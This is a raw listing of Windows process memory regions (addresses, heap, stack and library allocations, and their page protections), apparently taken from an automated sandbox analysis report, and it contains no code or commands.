trusted library allocation
page read and write
1DF2EE50000
heap
page read and write
13D01077000
trusted library allocation
page read and write
D6A4EBF000
stack
page read and write
1EBBB8CB000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
1DF2EFD0000
heap
page read and write
13D01E6C000
trusted library allocation
page read and write
7FFD9BB20000
trusted library allocation
page read and write
7FFD9BC70000
trusted library allocation
page read and write
1ACC4714000
heap
page read and write
FAA3A7E000
stack
page read and write
1DF16850000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page execute and read and write
7FFD9BC20000
trusted library allocation
page read and write
1EBD2E00000
heap
page read and write
1ACBFCC0000
heap
page read and write
7FFD9B990000
trusted library allocation
page read and write
215210BF000
trusted library allocation
page read and write
215384A2000
heap
page read and write
21521292000
trusted library allocation
page read and write
7FFD9B970000
trusted library allocation
page read and write
1ACC4714000
heap
page read and write
240B2FE7000
heap
page read and write
13D7E830000
heap
page read and write
7FFD9BB10000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
1DF16F7B000
trusted library allocation
page read and write
1EBBC1B6000
trusted library allocation
page read and write
7FFD9BB40000
trusted library allocation
page read and write
13D104AE000
trusted library allocation
page read and write
8814DCC000
stack
page read and write
1EBB8BC0000
trusted library section
page read and write
7FFD9BA90000
trusted library allocation
page execute and read and write
2409A766000
heap
page read and write
1DF2EE58000
heap
page read and write
13D189E3000
heap
page read and write
1ACBFD2F000
heap
page read and write
88139CE000
stack
page read and write
7FFD9B93C000
trusted library allocation
page execute and read and write
1ACBFDBF000
heap
page read and write
1EBD2C10000
heap
page read and write
1EBB8D80000
trusted library allocation
page read and write
86498C3000
stack
page read and write
1DF2EFF5000
heap
page read and write
2151DCC9000
heap
page read and write
1DF16855000
heap
page read and write
B1C7FEE000
stack
page read and write
7FFD9BC00000
trusted library allocation
page read and write
24098BD5000
heap
page read and write
2151DCF8000
heap
page read and write
21520579000
trusted library allocation
page read and write
2409B754000
trusted library allocation
page read and write
1EBBB8F4000
trusted library allocation
page read and write
13D01ABF000
trusted library allocation
page read and write
21520F98000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
1DF14E16000
heap
page read and write
D6A4E78000
stack
page read and write
13D01B0E000
trusted library allocation
page read and write
24098D90000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
1ACBFD4D000
heap
page read and write
2409A5E8000
heap
page read and write
7FFD9BAB2000
trusted library allocation
page read and write
2151F6B6000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
217EA820000
heap
page read and write
7FFD9BC3C000
trusted library allocation
page read and write
2409A6F0000
trusted library allocation
page read and write
7FFD9BD10000
trusted library allocation
page read and write
2151DEE5000
heap
page read and write
7FFD9BA72000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
7FFD9BC00000
trusted library allocation
page read and write
21790010000
trusted library allocation
page read and write
13D18991000
heap
page read and write
240B2E37000
heap
page read and write
240B2D2F000
heap
page read and write
7FFD9BBE0000
trusted library allocation
page read and write
7FFD9BCF0000
trusted library allocation
page execute and read and write
13D01BC6000
trusted library allocation
page read and write
1EBBA585000
heap
page read and write
7FF65A350000
unkown
page readonly
240B2DF0000
heap
page read and write
B1C847E000
stack
page read and write
217EA846000
heap
page read and write
7FFD9BC78000
trusted library allocation
page read and write
7FFD9BAD9000
trusted library allocation
page read and write
1ACC4692000
heap
page read and write
13D104E9000
trusted library allocation
page read and write
2409BAF4000
trusted library allocation
page read and write
2151DC85000
heap
page read and write
40BBFFE000
stack
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
13D7FEC0000
heap
page read and write
217803E7000
trusted library allocation
page read and write
7FFD9B8F0000
trusted library allocation
page read and write
240B3586000
heap
page read and write
1ACC4693000
heap
page read and write
7FFD9BD10000
trusted library allocation
page read and write
217EC930000
heap
page read and write
13D01C6C000
trusted library allocation
page read and write
7FFD9BB60000
trusted library allocation
page read and write
40BBDFE000
stack
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
13D018C8000
trusted library allocation
page read and write
1DF14F10000
heap
page readonly
240B2E3B000
heap
page read and write
7FFD9BC69000
trusted library allocation
page read and write
217EA6A0000
heap
page read and write
7FFD9BB80000
trusted library allocation
page read and write
1ACBFD15000
heap
page read and write
217900A2000
trusted library allocation
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
13D7E62F000
heap
page read and write
13D010FE000
trusted library allocation
page read and write
1ACBFD3F000
heap
page read and write
2409B6F2000
trusted library allocation
page read and write
7FF65A3AB000
unkown
page write copy
2409C365000
trusted library allocation
page read and write
2C7B8BE000
stack
page read and write
7FFD9BB00000
trusted library allocation
page read and write
FAA33FE000
stack
page read and write
B1C84F7000
stack
page read and write
2C7B9BC000
stack
page read and write
7FFD9B98C000
trusted library allocation
page execute and read and write
B1C87BE000
stack
page read and write
1EBB8BF5000
heap
page read and write
7FFD9BAA0000
trusted library allocation
page execute and read and write
7FFD9BC03000
trusted library allocation
page read and write
1ACBFC60000
heap
page read and write
1DF175CE000
trusted library allocation
page read and write
B1C83FE000
stack
page read and write
7FFD9BAC7000
trusted library allocation
page read and write
217EA790000
heap
page read and write
FAA36FE000
stack
page read and write
There are 1290 hidden memdumps, click here to show them.